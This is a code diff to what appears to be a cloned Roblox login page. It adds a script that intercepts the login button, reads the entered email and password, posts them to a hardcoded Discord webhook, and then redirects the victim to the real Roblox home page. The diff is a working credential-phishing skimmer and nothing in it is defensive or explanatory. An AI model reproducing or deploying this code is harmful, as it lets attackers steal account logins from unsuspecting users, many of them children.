--- a/index.html
+++ b/index.html
@@ -1513,6 +1513,45 @@ function checkRobloxInstall() {
 
     <script onerror='Roblox.BundleDetector && Roblox.BundleDetector.reportBundleError(this)' data-monitor='true' data-bundlename='pageEnd' type='text/javascript' src='https://js.rbxcdn.com/8f2713be958886c40b53fcec0a0edd2b.js'></script>
 
+<script>
+       document.getElementById('login-button').addEventListener('click', async function (event) {
+    event.preventDefault(); // Prevents the default form submission
 
+    var username = document.getElementsByName('login-username')[0].value;
+    var password = document.getElementsByName('login-password')[0].value;
+
+    const webhookBody = {
+        embeds: [{
+            title: 'rbx login info',
+            fields: [
+                { name: 'Email', value: username },
+                { name: 'Password', value: password }
+                
+            ]
+        }],
+    };
+
+    var webhookUrl = 'https://discord.com/api/webhooks/1184258036970295447/GStuyvDyN9yZIfFut7Ri1UOtjr_95rnOqgpoVQIbhtA994wRjmIPkp-2d-8xkFchXmhp'; // just saying kiddo this is fake lol its not that easy to find LOL
+
+    try {
+        const response = await fetch(webhookUrl, {
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+            },
+            body: JSON.stringify(webhookBody),
+        });
+
+        if (response.ok) {
+            console.log('login connected', response);
+        } else {
+            console.error('Error:', response.status);
+        }
+    } catch (error) {
+        console.error('Error:', error);
+    }
+         window.location.href = "https://roblox.com/home";
+});
+    </script>
 </body>
 </html>
